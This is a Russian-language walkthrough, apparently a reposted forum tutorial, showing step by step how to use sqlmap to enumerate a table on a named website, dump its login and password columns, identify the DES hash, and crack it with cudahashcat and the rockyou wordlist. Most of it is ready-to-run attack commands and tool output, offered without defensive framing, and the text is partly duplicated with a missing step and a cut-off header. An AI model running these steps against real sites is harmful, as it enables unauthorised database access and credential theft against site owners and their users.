SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (часть 1)
Шаг 4: Список столбцов в целевой таблице выбранной базы данных с использованием SQLMAP SQL инъекции:
Теперь нам нужно перечислить все столбцы целевой таблицы user_info базы данных clemcoindustries с помощью SQLMAP SQL инъекции. SQLMAP SQL инъекция упрощает выполнение следующей команды:
Это возвращает 5 записей из целевой таблицы user_info базы данных clemcoindustries.
Это именно то, что мы ищем ... user_login и user_password целевой таблицы.
Шаг 5: Список имен пользователей из целевых столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:
SQLMAP SQL инъекция - это просто! Просто снова запустите следующую команду:
Угадайте что? Теперь у нас есть имя пользователя из базы данных:
Почти все, нам теперь нужен только пароль для этого пользователя.
столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:
Вероятно, вы уже привыкли использовать SQLMAP SQL инъекцию. Используйте следующую команду для извлечения пароля для пользователя.
Но не спешите радоваться, этот пароль выглядит забавным. Это не может быть чьим-то паролем. Тот, кто оставляет свой сайт настолько уязвимым, просто не может иметь такой пароль.
Так оно и есть. Это хешированный пароль. Это значит, что пароль зашифрован, и теперь нам нужно его расшифровать.
Я рассказал о том, как расшифровать пароль на этих взламывающих пароли MD5, phpBB, MySQL и SHA1 с помощью Hashcat в посте про Kali Linux. Если вы пропустили его, то вы пропустили много.
Ниже я кратко расскажу ваш о том, как сделать это, но вы действительно должны научиться использовать hashcat.
Шаг 7: Взламывание пароля:
Таким образом, хешированный пароль выглядит следующим образом 24iYBc17xK0e. Но каким образом вы узнаете, какой тип хэша используется?
Определите тип хеша:
К счастью, Kali Linux предоставляет хороший инструмент, и мы можем использовать его, чтобы определить, какой это тип хэша. В командной строке введите следующую команду, а затем введите значение хеша:
Превосходно. Таким образом, мы видим, что это DES(Unix) хэш.
Взломайте HASH с помощью cudahashcat:
Прежде всего, мне нужно знать, какой код использовать для хэшей DES. Итак, давайте проверим, что:
Так что это или 1500 или 3100. Но это была база данных MYSQL, поэтому значение должно быть 1500.
Я сохранил значение хеша 24iYBc17xK0e. в файле DES.hash. Ниже приведена команда, которую я запускаю:
Интересная находка: Обычный Hashcat не смог определить код для хэша DES. (не в меню справки). Однако оба cudaHashcat и oclHashcat нашли и взломали ключ.
Во всяком случае, вот взломанный пароль: abc123 24iYBc17xK0e. :abc123
Теперь у нас есть пароль для этого пользователя.
Источник:
Шаг 4: Список столбцов в целевой таблице выбранной базы данных с использованием SQLMAP SQL инъекции:
Теперь нам нужно перечислить все столбцы целевой таблицы user_info базы данных clemcoindustries с помощью SQLMAP SQL инъекции. SQLMAP SQL инъекция упрощает выполнение следующей команды:
Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_i
nfo --columns
Это возвращает 5 записей из целевой таблицы user_info базы данных clemcoindustries.
Код:
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'gbhackers '
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
Это именно то, что мы ищем ... user_login и user_password целевой таблицы.
Шаг 5: Список имен пользователей из целевых столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:
SQLMAP SQL инъекция - это просто! Просто снова запустите следующую команду:
Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_info -C user_login --dump
Угадайте что? Теперь у нас есть имя пользователя из базы данных:
Код:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Почти все, нам теперь нужен только пароль для этого пользователя.
столбцов целевой таблицы выбранной базы данных с использованием SQLMAP SQL инъекции:
Вероятно, вы уже привыкли использовать SQLMAP SQL инъекцию. Используйте следующую команду для извлечения пароля для пользователя.
Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T
user_info -C user_password --dump
Код:
We have hashed password : 24iYBc17xK0e
Код:
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
Но не спешите радоваться, этот пароль выглядит забавным. Это не может быть чьим-то паролем. Тот, кто оставляет свой сайт настолько уязвимым, просто не может иметь такой пароль.
Так оно и есть. Это хешированный пароль. Это значит, что пароль зашифрован, и теперь нам нужно его расшифровать.
Я рассказал о том, как расшифровать пароль на этих взламывающих пароли MD5, phpBB, MySQL и SHA1 с помощью Hashcat в посте про Kali Linux. Если вы пропустили его, то вы пропустили много.
Ниже я кратко расскажу ваш о том, как сделать это, но вы действительно должны научиться использовать hashcat.
Шаг 7: Взламывание пароля:
Таким образом, хешированный пароль выглядит следующим образом 24iYBc17xK0e. Но каким образом вы узнаете, какой тип хэша используется?
Определите тип хеша:
К счастью, Kali Linux предоставляет хороший инструмент, и мы можем использовать его, чтобы определить, какой это тип хэша. В командной строке введите следующую команду, а затем введите значение хеша:
Код:
hash-identifier
Превосходно. Таким образом, мы видим, что это DES(Unix) хэш.
Взломайте HASH с помощью cudahashcat:
Прежде всего, мне нужно знать, какой код использовать для хэшей DES. Итак, давайте проверим, что:
Код:
cudahashcat --help | grep DES
Так что это или 1500 или 3100. Но это была база данных MYSQL, поэтому значение должно быть 1500.
Я сохранил значение хеша 24iYBc17xK0e. в файле DES.hash. Ниже приведена команда, которую я запускаю:
Код:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Интересная находка: Обычный Hashcat не смог определить код для хэша DES. (не в меню справки). Однако оба cudaHashcat и oclHashcat нашли и взломали ключ.
Во всяком случае, вот взломанный пароль: abc123 24iYBc17xK0e. :abc123
Теперь у нас есть пароль для этого пользователя.
Источник:
Ссылка скрыта от гостей